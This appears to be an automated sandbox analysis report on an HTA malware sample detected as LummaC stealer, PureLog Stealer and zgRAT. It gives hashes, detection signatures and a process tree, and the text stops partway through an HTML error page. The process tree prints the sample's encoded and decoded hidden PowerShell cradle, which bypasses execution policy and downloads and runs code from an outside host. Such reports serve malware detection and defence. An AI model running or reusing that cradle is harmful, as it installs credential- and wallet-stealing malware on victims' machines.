Edit tour
Windows
Analysis Report
title.mp4.hta
Overview
General Information
| Sample name: | title.mp4.hta |
| Analysis ID: | 1584778 |
| MD5: | 5ffa4145e79128ab1c56abfb5a8455d7 |
| SHA1: | e8cec6950853414976683615b1467b1d4dae8ee6 |
| SHA256: | 3cf8f04202e09ddfff4c1febc10873a38258116fadd806ce1110f36445bbeaf0 |
| Tags: | htaLummaStealeruser-lontze7 |
| Infos: |   |
 | |
Detection
LummaC, PureLog Stealer, zgRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 6880 cmdline: mshta.exe "C:\Users\ user\Deskt op\title.m p4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 744 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -enc UwBsA GUAZQBwACA AMgAwADsAU wB0AGEAcgB 0AC0AUAByA G8AYwBlAHM AcwAgACIAQ wA6AFwAVwB pAG4AZABvA HcAcwBcAFM AeQBzAFcAb wB3ADYANAB cAFcAaQBuA GQAbwB3AHM AUABvAHcAZ QByAFMAaAB lAGwAbABcA HYAMQAuADA AXABwAG8Ad wBlAHIAcwB oAGUAbABsA C4AZQB4AGU AIgAgAC0AQ QByAGcAdQB tAGUAbgB0A EwAaQBzAHQ AIAAiAC0Ad wAgAGgAaQB kAGQAZQBuA CAALQBlAHA AIABiAHkAc ABhAHMAcwA gAC0AbgBvA HAAIAAtAEM AbwBtAG0AY QBuAGQAIAB gACIAaQBlA HgAIAAoACg ATgBlAHcAL QBPAGIAagB lAGMAdAAgA FMAeQBzAHQ AZQBtAC4AT gBlAHQALgB XAGUAYgBDA GwAaQBlAG4 AdAApAC4AR ABvAHcAbgB sAG8AYQBkA FMAdAByAGk AbgBnACgAJ wBoAHQAdAB wAHMAOgAvA C8AYwBhAGI AZgAuAGsAb ABpAHAAZAB lAHMAYQBrA C4AcwBoAG8 AcAAvAHMAb QB1AGcAbAB lAC4AYgBkA CcAKQApAGA AIgAiACAAL QBXAGkAbgB kAG8AdwBTA HQAeQBsAGU AIABIAGkAZ ABkAGUAbgA = MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 916 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4628 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -ep bypass -nop -Com mand "iex ((New-Obje ct System. Net.WebCli ent).Downl oadString( 'https://c abf.klipde sak.shop/s mugle.bd') )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1712 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 5844 cmdline:
powershell -exec byp ass <!DOCT YPE html> <html lang ="en"> <h ead> <me ta charset ="UTF-8" / > <meta name="view port" cont ent="width =device-wi dth, initi al-scale=1 .0" /> < link rel=" icon" href ="https:// www.cloudf lare.com/f avicon.ico " /> <ti tle>Not Fo und</title > <style > body { font -family: s ystem-ui; font-w eight: 300 ; font -size: 1.2 5rem; color: #36 393a; display: f lex; a lign-items : center; justif y-content: center; } mai n { ma x-width: 1 200px; margin-to p: 120px; displa y: flex; flex-wr ap: wrap; align- items: cen ter; j ustify-con tent: cent er; } #text { max-wi dth: 60%; margin -left: 1re m; mar gin-right: 1rem; } main > section > div { margin-b ottom: 3.2 5rem; } svg { margin -left: 2re m; } @keyframe s eye-1 { 0% { transf orm: trans lateX(0); } 10%, 5 0% { transform: translate X(-5px); } 6 0% { transform: translate X(0); } 100% { tr ansform: t ranslateX( 0px); } } @keyframes eye-2 { 0% { transfo rm: transl ateX(0); } 1 0%, 50 % { t ransform: translateX (5px); } 60% { tr ansform: t ranslateX( 0); } 100% { tran sform: tra nslateX(0p x); } } sv g > .eye-1 { ani mation: ey e-1 3s inf inite; } svg > .eye-2 { animat ion: eye-2 3s 0.6s i nfinite; } h1 { font -size: 3.7 5rem; font-weigh t: 400; margin-b ottom: 0.5 rem; } h3 { font-siz e: 2rem; font-we ight: 400; color : #92979b; margi n: 0; } a { color: # 0055dc; } p { margin : 0; } #error- title { font-siz e: 2rem; margin- bottom: 1r em; } #footer- title { font-wei ght: 700; margin -bottom: 0 .75rem; } </sty le> </hea d> <body> <main> <sectio n id="text "> <di v> <h 1>Error 40 4</h1> <h3>Obje ct not fou nd</h3> </div> <div> <p> This o bject does not exist or is not publicly accessible at this URL. Check the URL of the object th at you're looking fo r or conta ct t he owner t o enable P ublic acce ss. < /p> </ div> < div> <p id="foo ter-title" >Is this y our bucket ?</p> <p> Learn how to enable <a hre f="https:/ /developer s.cloudfla re.com/r2/ data-acces s/public-b uckets/" >Pub lic Access </a > </p > </di v> </se ction> <section> <svg width= "414" height="2 12" v iewBox="0